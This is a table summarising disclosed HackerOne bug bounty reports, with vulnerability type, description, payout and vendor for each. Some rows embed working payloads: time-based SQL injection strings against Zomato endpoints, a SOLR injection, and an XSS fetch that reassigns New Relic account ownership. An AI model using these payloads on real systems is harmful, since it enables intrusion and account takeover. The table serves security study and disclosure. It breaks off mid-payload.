241 | 224 | Improper Authentication | Host(origin) checking of Digits SDK passes attacker controlled string to function expecting regex, leading to using regex-specific characters in the domain name allowing for bypassing the check. ("." matching any character). The impact was account takeover. | $5040 | Twitter | https://hackerone.com/reports/129873
242 | 225 | CSRF | User token leak through referer header, by abusing vulnerable chain of issues. This was due to insufficient refer header policy. The url was extracted through abusing an Open Redirect issue. The vulnerable endpoint was socialclub.rockstargames.com/crew/ | $750 | Rockstar Games | https://hackerone.com/reports/787160
243 | 226 | CSRF | Leaking user tokens through referer header by exploiting a chain of issues. The part handled in this report is Image injection leading to XSS on https://www.rockstargames.com/newswire/article | $750 | Rockstar Games | https://hackerone.com/reports/790465
244 | 227 | CSRF | Image injection on www.rockstargames.com/IV/screens/1280x720Image.html can be combined with other issues to leak user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/784101
245 | 228 | Information disclosure | Image injection on https://www.rockstargames.com/careers#/offices/. Combined in a chain with other attacks could lead to leaking user tokens. | $500 | Rockstar Games | https://hackerone.com/reports/491654
246 | 229 | Insufficient Session Expiration | No session invalidation after logout. Attacker can reuse known tokens | $100 | Visma | https://hackerone.com/reports/808731
247 | 230 | Remote File Inclusion | Remote file inclusion through downloading file from chat. Uses path traversal to extract anywhere, and it can be hidden by setting a title for the file. | $5000 | Keybase | https://hackerone.com/reports/713006
248 | 231 | Insecure Design Principles | Using RTLO (Right to left override) character allows spoofing the URL that will be displayed when navigating out of rinkerboats.vanillacommunities.com leading to potential phishing / other attacks. | $150 | Vanilla | https://hackerone.com/reports/563268
249 | 232 | XSS | Stored XSS in the Customer Number field. | $250 | Visma | https://hackerone.com/reports/882189
250 | 233 | Information disclosure | CodeQL query to detect J2EE server having directory listing enabled, potentially allowing for source code disclosure. | $1800 | Github Security Lab | https://hackerone.com/reports/909374
251 | 234 | XSS | XSS in account.mail.ru due to unsafe handling of GET parameter (User-assisted == Requires user interaction?) | $1000 | Mail.ru | https://hackerone.com/reports/889874
252 | 235 | Information leak | MySQL credentials leaked to publicly available config file | $150 | Mail.ru | https://hackerone.com/reports/879389
253 | 236 | SSRF | SSRF through using the relap.io function allowing for fetching external resources, allowing access to the production network in a transparent manner. (Non-blind) | $1700 | Mail.ru | https://hackerone.com/reports/739962
254 | 237 | XSS | Stored XSS by authenticated user to all other users through the /wp-admin/edit.php?post\_type=forum endpoint | $225 | Wordpress | https://hackerone.com/reports/881918
255 | 238 | Information leak | A misconfigured web directory disclosed files that showed NordVPNs public proxy list and corresponding port numbers | $50 | NordVPN | https://hackerone.com/reports/791826
256 | 239 | Privilege Escalation | An attacker can kick out any other member of any organization, given that they know the membership ID of the user. This is due to an IDOR in the delete membership functionality, which can be triggered by: `DELETE /api/memberships/id` | $100 | Helium | https://hackerone.com/reports/810320
257 | 240 | Command Injection | Reflected XSS in certain endpoints allows account takeover. Attackers can also perform sensitive actions on behalf of authenticated users. | $594 | Ubiquiti Inc. | https://hackerone.com/reports/661647
258 | 241 | Command Injection | Certain end-points are vulnerable to command injection when using specifically crafted input, leading to RCE. This vulnerability can be triggered through other vulnerabilities, like XSS and CSRF. | $6839 | Ubiquiti Inc. | https://hackerone.com/reports/703659
259 | 242 | Logic bug | Bat files and other malicious executables (or any other filetypes and content) can be concealed as normal content, like .csv files by including illegal characters as content. | $1500 | Slack | https://hackerone.com/reports/833080
260 | 243 | XSS | XSS through unsafe URI handling in ASP.net on base starbucks.com domain | $500 | Starbucks | https://hackerone.com/reports/881115
261 | 244 | Bruteforce | User passwords can be brute forced due to lack of rate limiting | $700 | Twitter | https://hackerone.com/reports/854424
262 | 245 | Request Smuggling | console.helium.com is vulnerable to CL.TE request smuggling. | $500 | Helium | https://hackerone.com/reports/867952
263 | 246 | CSRF | CSRF allowing an attacker to import any novel to the victims chatstory (pixiv service) | $500 | Pixiv | https://hackerone.com/reports/534908
264 | 247 | Improper Authentication | 2FA bypass by not supplying a 2FA code. Likely lack of null check. Vulnerable request is likely something like this: `"email":"attack@lol.com","2FA":""` | $1000 | Glassdoor | https://hackerone.com/reports/897385
265 | 248 | Logic Bug | Users are able for forge requests, leading to being able to spawn additional units at will. This is done through (what looks like) a leaked secret and a lack of proper server side validation. | $1100 | InnoGames | https://hackerone.com/reports/802636
266 | 249 | Open Redirect | Open redirect requiring user to click in order to work | $100 | LocalTapiola | https://hackerone.com/reports/194017
267 | 250 | Insecure design principles | CodeQL query to check for improper SSL certificates | $1800 | GitHub | https://hackerone.com/reports/917454
268 | 251 | Command injection | CodeQL query to detect OGNL injection | $2300 | Github | https://hackerone.com/reports/917455
269 | 252 | Use after free | A use-after-free vulnerability exists in the IPV6 option of setsockopt, as it is possible to race and free the `struct_ip6_pktopts` buffer (TOCTOU) while it is being handled by `ip6_setpktopt`. This struct contains pointers that can be used for R/W primitives in the kernel. Combining this vulnerability with a known WebKit issue allows for easy exploitation. | $10,000 | PlayStation | https://hackerone.com/reports/826026
270 | 253 | CSRF | `/community/create-post.js` was vulnerable to CSRF attacks, allowing an attacker to spam the community boards as other users. This attack was only possible through Chrome. | $150 | Rockstar Games | https://hackerone.com/reports/487378
271 | 254 | CSRF | `https://www.rockstargames.com/reddeadonline/feedback/submit.json` was vulnerable to CSRF attacks and could be exploited through a remote server. This attack was only possible through Chrome. | $150 | Rockstar Games | https://hackerone.com/reports/796295
272 | 255 | LFI | LFI of files with .md extension from `/var/www/dashboard/new/` was possible. In addition, remote file inclusion from github was possible due to the default value of `$docs_path`, leading to XSS. | $300 | TTS Bug Bounty | https://hackerone.com/reports/895972
273 | 256 | Logic Bug | Unlimited file upload in the image assigned to a contact leads to XSS by uploading malicious SVG. | $100 | Nextcloud | https://hackerone.com/reports/808287
274 | 257 | CRLF Injection | Malicious users (non-admins) can write to memcached when using a malicious URL as a share. | $100 | Nextcloud | https://hackerone.com/reports/592864
275 | 258 | HTTP Request Smuggling | CL.TE based request smuggling on api.zomato.com leading to account takeover among other issues. This issue was only reproducible when using the DELETE verb. As such, make sure to test for all HTTP verbs when checking for Request Smuggling | $5000 | Zomato | https://hackerone.com/reports/771666
276 | 259 |XSS | Reflected XSS on `https://www.tumblr.com/abuse/start?prefill=`. It only works on Firefox version 69 or lower. | $250 | Automattic | https://hackerone.com/reports/915756
277 | 260 | Logic Bug | CodeQL query to detect insecure use of postMessage. It checks if indexOf or startsWith is used to check MessageEvent.origin, which can lead to XSS or other issues. | $1800 | GitHub | https://hackerone.com/reports/920285
278 | 261 | DoS | DoS by sending many requests to apply for a certain job, due to relying on responses from a 3rd party server before returning. | $100 | Maximum | https://hackerone.com/reports/892615
279 | 262 | Session Fixation | An issue where not all sessions being terminated when the password was reset. | $50 | Moneybird | https://hackerone.com/reports/743518
280 | 263 | Improper authentication | https://werkenbijderet.nl/vacature-alert endpoint did not have proper rate limiting implemented, leading to being able to send thousands of mails within 10 minutes. | $100 | Maximum | https://hackerone.com/reports/882942
281 | 264 | SSRF | Being able to call all internal classes, functions and parameters due to everything being declared public. This leads to blind SSRF through Gopher protocol. | $300 | TTS Bug Bounty | https://hackerone.com/reports/895696
282 | 265 | IDOR | Read only user can delete other users through IDOR | $50 | Helium | https://hackerone.com/reports/888729
283 | 266 | Brute Force | It is possible to brute force the login prompt of `app.mopub.com` due to only having IP based rate limiting. It should have CAPTCHA or block all access to the locked out account, not just add restrictions to the violating IP (as changing IPs is easy). | $420 | Twitter | https://hackerone.com/reports/819930
284 | 267 | XSS | Reflected XSS in GET parameter | $300 | Mail.ru | https://hackerone.com/reports/848742
285 | 268 | Improper access control | A partner's superuser account could access information of drivers belonging to other partners, including passport and drivers license data | $8000 | Mail.ru | https://hackerone.com/reports/863983
286 | 269 | Information leak | Bot Token for ICQ was leaked in GIT commit data for opensource JIRA plugin | $150 | Mail.ru | https://hackerone.com/reports/902064
287 | 270 | Logic bug | It was possible to create accounts with nicknames belonging to existing accounts | $150 | Mail.ru | https://hackerone.com/reports/824973
288 | 271 | XSS | Viewing a malicious SVG lead to access to local files (LFI?) on certain iOS versions due to cross-application scripting in the Mail.ru iOS Mail app | $1000 | Mail.ru | https://hackerone.com/reports/900543
289 | 272 | Race Condition | Malicious applications could create multiple valid OAUTH sessions by abusing a race condition. | $250 | Razer | https://hackerone.com/reports/699112
290 | 273 | IDOR | IDOR in the stocky application allows for changing columns of other users | $750 | Shopify | https://hackerone.com/reports/853130
291 | 274 | Account Takeover | If staff/the store owner has yet to register a google account to his Shopify ID, and you have privileges to change their registered email, you can take over the account by setting their email to your gmail address. Knowing this means you can takeover accounts by having the admin be exposed to an xss performing this operation. It only works with Google Apps enabled. | $2000 | Shopify | https://hackerone.com/reports/892904
292 | 275 | Improper authentication | The Stocky application did not have any permission checks to download purchase orders, leading to anyone being able to download the orders. | $500 | Shopify | https://hackerone.com/reports/802286
293 | 276 | CRLF Injection | In the Synthetics "Ping" functionality, you can insert newline characters, resulting in almost full control over the email functionality. You are able to send emails to anyone, with any content. The only limitation is a small one in the "Subject" field. | $500 | New Relic | https://hackerone.com/reports/347439
294 | 277 | IDOR | The `selectAddressId` in the cookie combined with the `delivery_subzone` in the GET request, allows for unauthenticated enumeration of all addresses registered to users. This cannot be tied to a specific user. This is due to the backend disclosing the full, stored address of a user, given that the `delivery_subzone` matches that associated with the `selectAddressId` without any further authentication | $1500 | Zomato | https://hackerone.com/reports/514897
295 | 278 | Logic bug | Due to not sufficiently protecting which apps can retrieve the token in the authentication flow, it is possible for a malicious application to take over the account of the user. This requires a malicious app preinstalled on the victims device to be successful. | $500 | Shopify | https://hackerone.com/reports/855618
296 | 279 | Improper authentication | An attacker can generate app tokens through the `adminGenerateSession` mutation in the admin panel, as a staff member with no permissions. This would give access to a small subset of installed apps, limited to the current shop. | $2000 | Shopify | https://hackerone.com/reports/898528
297 | 280 | XSS | Stored XSS in admin interface through "evaluation of purchase process"-window | $1500 | Mail.ru | https://hackerone.com/reports/874387
298 | 281 | DoS | Certain files in /etc/ are writable. For example hosts, hostname and resolve.conf. While the last two seems to have special handling, /etc/hosts is inherently vulnerable. This leads to being able to DoS a service by writing large amounts of data to the file. | $1000 | Kubernetes | https://hackerone.com/reports/867699
299 | 282 | Logic bug | GraphQL query for finding incorrect hostname comparison. This is especially prevalent in Android applications. | $1500 | GitHub | https://hackerone.com/reports/929288
300 | 283 | Logic bug | Misconfiguration lead to being able to get SmartDNS for free for longer than it should be. | $700 | NordVPN | https://hackerone.com/reports/925757
301 | 284 | XXE | XXE on starbucks.com.sg/RestAPI/* leading to arbitrary file read | $500 | Starbucks | https://hackerone.com/reports/762251
302 | 285 | Account Takeover | Due to improper authentication when setting up 2FA, it is possible to takeover an account given that you know the USER ID. This is not likely to leak and as such reduces the impact of this vulnerability. | $100 | Helium | https://hackerone.com/reports/810880
303 | 286 | Information Disclosure | It was possible to view thumbnails of private videos through attacking the API | $750 | Pornhub | https://hackerone.com/reports/138703
304 | 287 | DoS | Improper handling of renaming HackerOne groups for managing access rights for programs, leads to excessive resource use which may lead to DoS | $2500 | HackerOne | https://hackerone.com/reports/880187
305 | 288 | DoS | DoS through recursive evaluation. Can be done remotely by an attacker with elevated privileges. | $200 | Kubernetes | https://hackerone.com/reports/882923
306 | 289 | Logic bug | By tampering requests regarding which retailers you can earn cashback from to be an empty list, you can earn cashback from all retailers on the platform. Normally premium users can only select 6 and normal users can only select 3. This can only be set once, but using this vulnerability you can switch at any time. | $1000 | Curve | https://hackerone.com/reports/672487
307 | 290 | Use of weak PRNG | Grammarly Keyboard for Android used weak PRNG allowing a malicious app installed on the device to guess the PKCE code value and steal the OAUTH access token of a user. Fixed by changing to SecureRandom | $2000 | Grammarly | https://hackerone.com/reports/824931
308 | 291 | Improper Authentication | H1 SAML implementation allows for re-using SAML response for up to 10 minutes, allowing for increased risk in case an attacker can ever intercept or otherwise compromise such a request. | $500 | HackerOne | https://hackerone.com/reports/888930
309 | 292 | DoS | DoS of account (for Chrome) when viewing a tweet containing the link twitter.com/%00 | $560 | Twitter | https://hackerone.com/reports/921286
310 | 293 | IDOR | IDOR allows user to access pictures from other users, including EXIF data. | $200 | IRRCloud | https://hackerone.com/reports/906907
311 | 294 | Information leak | After the `policy_markdown_html` was added inside the team Graphql query, it was possible to enumerate if public programs also had private programs. In case they did, you could also see their internal policy. | $2500 | HackerOne | https://hackerone.com/reports/877642
312 | 295 | Phishing | Ability to spoof interface elements through adding tags or attributes in calendar events at calendar.mail.ru | $150 | Mail.ru | https://hackerone.com/reports/847473
313 | 296 | Code injection | CodeQL query for detecting possible template injections in Python | $2300 | Github | https://hackerone.com/reports/944359
314 | 297 | XSS | By adding a link in a post and manually editing out a portion (`denied:`), then reblogging the post, the XSS will execute after the victim clicks the link (on the reblogged post). | $350 | Automattic | https://hackerone.com/reports/882546
315 | 298 | Command Injection | Since GitLab allows for code injection through Mermaid, you can achieve arbitrary PUT requests in the context of the victim through this command injection. The victim has to have the required privilege to perform the action for the attack to succeed. | $3000 | Gitlab | https://hackerone.com/reports/824689
316 | 299 | SQLi | An SQL Injection existed in a Razer Gold asset due to using an outdated instance of PHPlist. The injection point is the _body parameter **name**_ and not the value! | $2000 | Razer | https://hackerone.com/reports/824307
317 | 300 | Code injection | Due to a vulnerability in how the executable launched related executables, it was possible to escalate privileges by abusing this issue. (Likely similar to DLL injection or unquoted path issues.) The issue was in a Cortex related service. | $750 | Razer | https://hackerone.com/reports/769684
318 | 301 | IDOR | An alternate site shared database and cookie credentials with `card.starbucks.com.sg`. By exploiting the alternate site, the hacker could copy over the cookie value and take over the account on starbucks. | $6000 | Starbucks | https://hackerone.com/reports/876300
319 | 302 | Command injection | AWS S3 bucket takeover of multiple buckets. The buckets were still referenced in a test script and as such could have resulted in RCE. | $12,500 | Mapbox | https://hackerone.com/reports/329689
320 | 303 | CSRF | Login CSRF via OATH code in `lootdog.io` allows an attacker to replace a user's session with the attackers session. | $150 | Mail.ru | https://hackerone.com/reports/892986
321 | 304 | DoS | Due to relying on AJV, and also using `allErrors:true`, Fastify is vulnerable to DoS when there is potentially slow matching patterns or if `uniqueItems` is in the schema. | $250 | Node.js third-party modules | https://hackerone.com/reports/903521
322 | 305 | DoS | By submitting a very long password, the hashing algorithm on the server will take a lot of resources and potentially result in DoS due to memory exhaustion. | $100 | Nextcloud | https://hackerone.com/reports/840598
323 | 306 | Information Disclosure | Due to lack of access control in `ajaxgetachievementsforgame`, it is possible to see achievement names, display names and descriptions for unreleased games if you find a user who has the achievements for those unreleased apps (beta tester or similar) | $750 | Valve | https://hackerone.com/reports/835087
324 | 307 | Open Redirect | Reverse tabnabbing (changing location of the original page page when opening a link in a new tab) was possible in the printing source document images functionality. | $100 | Visma Public | https://hackerone.com/reports/911123
325 | 308 | Client side enforcement of Server-side Security | Due to silently ignoring the content length header, it is possible to bypass the size check for S3 buckets and upload attachments of any size. The solution is to add `content-length` header to whitelisted headers. | $500 | Ruby on Rails | https://hackerone.com/reports/789579
326 | 309 | Logic bug | When creating a hash, the permit function does not sufficiently protect when converting using `.each()`, allowing for sneaking in additional parameters that should not logically be present | $500 | Ruby on Rails | https://hackerone.com/reports/292797
327 | 310 | Null pointer dereference | A lack of proper checks for user supplied data results in a null pointer dereference. | $1500 | Open-Xchange | https://hackerone.com/reports/827729
328 | 311 | Use After Free | Due to incorrectly decreasing a reference counter, by sending a lot of newline characters ("\n") you can reach code checking the `cmd`-variable which has previously been freed. | $500 | Open-Xchange | https://hackerone.com/reports/827051
329 | 312 | IDOR | Account takeover through IDOR in password recovery procedure | $1500 | Mail.ru | https://hackerone.com/reports/843160
330 | 313 | IDOR | Could disclose attributes of arbitrary sites due to a IDOR in `relap.io` | $750 | Mail.ru | https://hackerone.com/reports/749887
331 | 314 | XSS | By uploading a PNG with JS and XML code, and adding it to a Wiki page, it was possible to achieve stored XSS | $1500 | GitLab | https://hackerone.com/reports/880099
332 | 315 | Improper Access Control | Lack of access control on the `ListMembers` query allowed for enumeration of members in private lists. Finding the TwitterID is difficult, but can be done by brute force by attacking different endpoints. To further show impact, it was demonstrated that `x-response-time` header discloses if the lists exists or not. | $2940 | Twitter | https://hackerone.com/reports/885539
333 | 316 | XSS | Stored XSS through the blob-viewer. The payload is in the description field. | $2000 | GitLab | https://hackerone.com/reports/806571
334 | 317 | SSRF | Chaining redirects in grafana allows for SSRF using any HTTP verb to any arbitrary endpoint. For more information, see Rhynorater's talk at HactivityCon 2020. | $12,000 | GitLab | https://hackerone.com/reports/878779
335 | 318 | Logic bug | By supplying an attacker controlled link, the attacker can get a copy of the PoC, if the victim (person creating a poc) submits the details on the page. There were multiple bypasses possible due to a loosely configured regex, which was fixed. | $1000 | BugPoc | https://hackerone.com/reports/926221
336 | 319 | Logic bug | Due to lack of association checks between 3rd party wallet IDs and user IDs, it was possible to purchase Zomato Gold memberships using other user's 3rd party wallets, effectively having them pay for it. | $2000 | Zomato | https://hackerone.com/reports/938021
337 | 320 | Logic bug | Ability to decrease payment by maximum 1 currency unit (0.99) for any purchase | $150 | Zomato | https://hackerone.com/reports/927661
338 | 321 | Improper access control | Access control issue due to not correctly checking permissions in the active session for the user | $100 | Visma Public | https://hackerone.com/reports/812143
339 | 322 | Information leak | Ability to see error message related to character encoding from SQL operation by adding the poop-emoji to the email field during registration | $100 | Unikrn | https://hackerone.com/reports/866271
340 | 323 | SQL Injection | SOLR injection through adding `\`to the query. | $100 | Zomato | https://hackerone.com/reports/844428
341 | 324 | SQL Injection | Blind SQLi in `res_id` of `/php/geto2banner`. PoC is `res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END&city_id=0` | $2000 | Zomato | https://hackerone.com/reports/838855
342 | 325 | SQL Injection | Same as #326, but on a different endpoint: `/php/widgets_handler.php`. PoC: `:/php/widgets_handler.php?method=getResWidgetButton&res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END` | $2000 | Zomato | https://hackerone.com/reports/836079
343 | 326 | Improper access control | The food.grammarly.io site uses Meter framework, and is lacking proper authorization for sensitive endpoints. The attacker could leak user data and employee data, including access tokens, by calling the functions directly from JS (for example in dev tools) | $1000 | Grammarly | https://hackerone.com/reports/745495
344 | 327 | SQL Injection | The reporter identified a SOLR injection on the `user_id` parameter at `:/v2/leaderboard_v2.json`. This had low impact, but the internal team found a boolean based blind SQLi in the same codebase when investigating and rewarded the report as such. | $2000 | Zomato | https://hackerone.com/reports/952501
345 | 328 | Special element injection | SOLR injection similar to #324, but on a different endpoint. PoC `:v2/red/homepage.json?lat=&lon=&city_id={!dismax+df=city_id}86&android_country=US&lang=en&android_language=en` | $150 | Zomato | https://hackerone.com/reports/953203
346 | 329 | Missing authorization | Missing authorization checks lead to a user only allowed to do sales being able to record payments he was not supposed to | $250 | Visma Public | https://hackerone.com/reports/919008
347 | 330 | SSRF | CodeQL query for detecting SSRF issues in Golang libraries and code | $1800 | Github Security lab | https://hackerone.com/reports/956296
348 | 331 | LDAP Injection | CodeQL query for detecting LDAP injections in Java, supporting Java JNDI, UnboundID, SPring LDAP and Apache LDAP API | $2500 | Github Security lab | https://hackerone.com/reports/956295
349 | 332 | XSS | Stored XSS through the chartbuilder in `one.newrelic.com`. Payload: `SELECT '“> "' Style=position\' FROM SyntheticCheck` | $2500 | New Relic | https://hackerone.com/reports/634692
350 | 333 | Information leak | Able to view full name of users who are not yet part of your account. This can be achieved by creating a note, viewing it and trying to share it with the invited account. | $750 | New Relic | https://hackerone.com/reports/476958
351 | 334 | Privilege escalation | Restricted users are able to delete Key transaction tags through the GUI even though they should only have READ-access. | $750 | New Relic | https://hackerone.com/reports/638685
352 | 335 | Privilege escalation | An unrestricted user is able to view the application token for a mobile app by directly visiting the `/deploy` endpoint for the app. | $500 | New Relic | https://hackerone.com/reports/479139
353 | 336 | IDOR | Access to a subset of a victims Insights Dashboards through a GraphQL query with insufficient validation | $1500 | New Relic | https://hackerone.com/reports/765565
354 | 337 | Logic bug | Ability to buy PRO subscriptions for reduced prices by tampering the pr. unit price | $203.5 | New Relic | https://hackerone.com/reports/783688
355 | 338 | Improper access control | Restricted users are able to delete NerdStorage documents created/owned by any user on that account, through GraphQL query. | $600 | New Relic | https://hackerone.com/reports/766145
356 | 339 | Improper access control | A restricted user was able to update the Aodex target for an application by abusing a GraphQL mutation without proper validation and authorization | $626 | New Relic | https://hackerone.com/reports/776449
357 | 340 | Violation of secure design principles | It was not possible to delete API keys in the application, even though the GUI said it was possible and the action succeeded. This was true even for users with an Admin/Owner role. | $500 | New Relic | https://hackerone.com/reports/782703
358 | 341 | Code injection | By abusing a CSRF vulnerability in the admin panel, the reporters were able to achieve stored XSS. Then, using the stored XSS vulnerability, they managed to escalate the vulnerability to RCE. The attack required Social Engineering of a Wordpress Admin (to click the initial link) to be successful | $506 | New Relic | https://hackerone.com/reports/941421
359 | 342 | Improper access control | A test endpoint for Synthetic monitors was found by the reporter. It did not validate permissions of the user, causing low privileged users to be able to create monitors using Secure Credentials | $500 | New Relic | https://hackerone.com/reports/788499
360 | 343 | IDOR | The reporter found a way to link an account with any Partnership as long as the ID was known. It was resolved by adding proper validation. | $695 | New Relic | https://hackerone.com/reports/786109
361 | 344 | XSS | Stored XSS in the Synthetics private locations list. Both the Label and Description fields were vulnerable. PoC: `` | $2500 | New Relic | https://hackerone.com/reports/680240
362 | 345 | Improper access control | Restricted users are able to create, edit and remove tags from the NerdGraph entities. | $750 | New Relic | https://hackerone.com/reports/757957
363 | 346 | XSS | Stored XSS in the "Position" field when applying for "Support/Moderator" jobs at recruit.innogames.de | $500 | Innogames | https://hackerone.com/reports/917250
364 | 347 | IDOR | An endpoint for testing Synthetics monitors without proper validation allowed monitors from other accounts to run on your account, given that they knew the monitors ID (on victims account) | $2500 | New Relic | https://hackerone.com/reports/787886
365 | 348 | XSS | Stored XSS across accounts through the embedded charts page. The vulnerable field is `chart_title` and the PoC is: ``. Multiple bypasses was also found for this issue | $3625 | New Relic | https://hackerone.com/reports/709883
366 | 349 | XSS | Stored XSS in the transactionName field of the Beta map functionality. PoC is a simple `"-alert(document.domain)-"` | $2500 | New Relic | https://hackerone.com/reports/667770
367 | 350 | XSS | Cross account stored XSS by injecting the payload into a chart, when it is displayed inside a note. The exploit abuses the `href` attribute by using a `javascript:alert()"` payload. This XSS requires no user interaction. | $4250 | New Relic | https://hackerone.com/reports/507132
368 | 351 | Improper access control | There was a misconfiguration in CORS-policy where all assets trusted the domain `nr3.nr-assets.net` where users can upload arbitrary content. (For example Nerdlet artifacts) This allows an attacker to upload malicious files of arbitrary types and execute arbitrary actions on behalf of the victim in various ways due to the incorrect configuration. Valid fixes are either to move user content to another sandbox domain or to amend the CORS policy. | $3125 | New Relic | https://hackerone.com/reports/751699
369 | 352 | Information disclosure | CORS misconfiguration allows requests from sandbox containing user apps, leading to potential disclosure of nerdpacks, nerdlets, and launcher ID's, and also source code of the victims app. | $625 | New Relic | https://hackerone.com/reports/746786
370 | 353 | XSS | Stored XSS in admin interface when creating a new alert. By formatting the url as: `user:password@domain.com` the server accepts the payload, which is: `javascript:fetch("https://rpm.newrelic.com/user_management/accounts/{ACCOUNT_ID}/update_primary_admin?value={ATTACKER_ID}",{method:"PUT",headers:{"X-Requested-With":"XMLHttpRequest"}}).then(function(_){alert("you_have_lost_your_ownership");close()})//@asd.com` | $1337 | New Relic | https://hackerone.com/reports/605845
371 | 354 | Memory Corruption | Missing best practices like having ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention) and CFG (Control Flow Guard) enabled is lacking | $50 | Nextcloud | https://hackerone.com/reports/380102
372 | 355 | DoS | Denial of Service by poisoning the cache with invalid CORS Header, due to an endpoint echoing back and setting the CORS `Allow-Origin`Header to the supplied "origin" value. | $200 | Automattic | https://hackerone.com/reports/921704
373 | 356 | XSS | When connecting to an invalid website, it launches a pop-up which can contain attacker-controlled content. By using file-scheme, for example, you can trick users into launching arbitrary files on the local machine | $100 | Nextcloud | https://hackerone.com/reports/685552
374 | 357 | Path Traversal | The linux client is vulnerable to an attack where an administrator can inject path traversal payloads into filenames (../) in order to write files to arbitrary locations within the control of the nextcloud app, on the victims machine. It only allows for creating new files, not modify existing ones, and needs to be continously exploited to have effect. | $250 | Nextcloud | https://hackerone.com/reports/590319
375 | 358 | SSRF | SSRF in PlantUML staging server, due to accepting the `!include` function. | $100 | GitLab | https://hackerone.com/reports/689245
376 | 359 | XSS | Stored XSS due to improper filtering of attributes after admin has edited them. | $650 | WordPress | https://hackerone.com/reports/633231
377 | 360 | XSS | Stored XSS due to improper filtering of attributes after admin has edited them. Different case from #359 | $650 | WordPress | https://hackerone.com/reports/497724
378 | 361 | XSS | Stored XSS in First and Last Name field for "Staff" account | $3000 | Shopify | https://hackerone.com/reports/948929
379 | 362 | Privilege Escalation | An attacker can register an account with an email, get permissions and then be deleted. After being deleted, by accessing `accounts.shopify.com` with the now deleted account, you still have access. | $1000 | Shopify | https://hackerone.com/reports/870001
380 | 363 | Information disclosure | A bug in graphql access controlled allowed an attacker with "customer" permissions to leak additional data they should not have access to, from orders. | $1500 | Shopify | https://hackerone.com/reports/882412
381 | 364 | Information disclosure | By first getting an API key, then querying for specific data, staff members can access data they are not supposed to have access to. | $1000 | Shopify | https://hackerone.com/reports/901775
382 | 365 | Information disclosure | Users without any permission can access certain store information through GraphQL query. | $500 | Shopify | https://hackerone.com/reports/409973
383 | 366 | XSS | Reflected XSS through the `skuNo` & `skuImgUrl` parameters at `https://www.istarbucks.co.kr/app/getGiftStock.do` | $250 | Starbucks | https://hackerone.com/reports/768345
384 | 367 | Improper access control | Password reset link can be used to reset password multiple times. | $500 | Shopify | https://hackerone.com/reports/898841
385 | 368 | IDOR | The last 4 digits of a registered credit card could be obtained through error messages on the `/profile_payment/save`endpoint by abusing an IDOR | $500 | Yelp | https://hackerone.com/reports/361984
386 | 369 | IDOR | An IDOR allowed an attacker to order food on GrubHub by using someone elses credit card on the `/checkout/transaction_platform` endpoint. | $2500 | Yelp | https://hackerone.com/reports/391092
387 | 370 | IDOR | An IDOR on the `/rewards/signup` endpoint allowed an attacker to associate a random credit card to their account. While it could not be used. it allowed for viewing the transaction history and cash back amounts received | $2000 | Yelp | https://hackerone.com/reports/358143
388 | 371 | Stack overflow | Half Life 1 allows taking arguments from command-line to launch a mod/specific game. This is done through `-game `. The argument is copied using strcopy resulting in an overflow being possible. | $1150 | Valve | https://hackerone.com/reports/832750
389 | 372 | Buffer Overflow | By loading a malicious map-file (.bsp) an attacker can achieve RCE on any victim, if they load the map. This works on any GoldSrc game | $450 | Valve | https://hackerone.com/reports/763403
390 | 373 | Buffer Overflow | The spk console command has no length check before copying it into a stack based buffer, leading to being able to achieve RCE by having a victim load a malicious .cfg file. | $350 | Valve | https://hackerone.com/reports/769014
391 | 374 | IDOR | An IDOR when creating shipping labels allows an attacker to request print labels (and I assume see the information related to the order) for stores he does not have access to. | $1000 | Shopify | https://hackerone.com/reports/884159
392 | 375 | Improper authentication | The `getLoginStatus` call in Digits allows an attacker to retrieve OAuth Credentials for any account, due to improperly verifying domains by utilizing the referer header. If this header was empty, the application considered the request valid, which was the issue. | $5040 | Twitter | https://hackerone.com/reports/168116
393 | 376 | Information disclosure | CodeQL query to detect logging of potentially sensitive information in JS based applications | $1800 | Github Security Lab | https://hackerone.com/reports/963816
394 | 377 | Information disclosure | CodeQL query to detect basic authentication over HTTP in java.net and Apache HttpClient libraries. This is vulnerable due to basic auth only using base64 encoding and being easily reversible. | $2300 | Github Security Lab | https://hackerone.com/reports/963815
395 | 378 | DoS | Lodash V.4.17.15 was vulnerable to prototype pollution, allowing for potential DoS. | $250 | NodeJS 3rd party modules | https://hackerone.com/reports/864701
396 | 379 | Privacy Violation | Clickjacking was possible during the payment process, leading to an attacker being able to trick the victim into paying for items using their stored credit card. | $400 | Yelp | https://hackerone.com/reports/391385
397 | 380 | UI Redressing (Clickjacking) | Multiple endpoints were vulnerable to clickjacking. | $500 | Yelp | https://hackerone.com/reports/305128
398 | 381 | UI Redressing (Clickjacking) | Clickjacking was possible on the `/reservations` endpoint, possibly allowing an attacker to leak information of a victim or incurring monetary loss for the victim | $500 | Yelp | https://hackerone.com/reports/355859
399 | 382 | Information disclosure | It is possible to disclose all details about all pentesters invited to a test, regardless if they accepted or not. This allows leaking sensitive information. | $500 | HackerOne | https://hackerone.com/reports/958374
400 | 383 | XSS | Stored XSS through the dashboard builder within New Relic One. | $2500 | New Relic | https://hackerone.com/reports/626082
401 | 384 | Privilege Escalation | Synthetics did not have the matching permissions compared to other functionality, allowing for users to have higher privileges than intended. | $750 | New Relic | https://hackerone.com/reports/387290
402 | 385 | Privilege Escalation | Due to changing to use Zuora for managing customer subscriptions, members who do not have such access through the New Relic platform, can access the information through the Zoura API. | $900 | New Relic | https://hackerone.com/reports/501672
403 | 386 | XSS | Stored XSS via role name in JSON chart, which was part of a prerelease UI. Payload was: `/*\"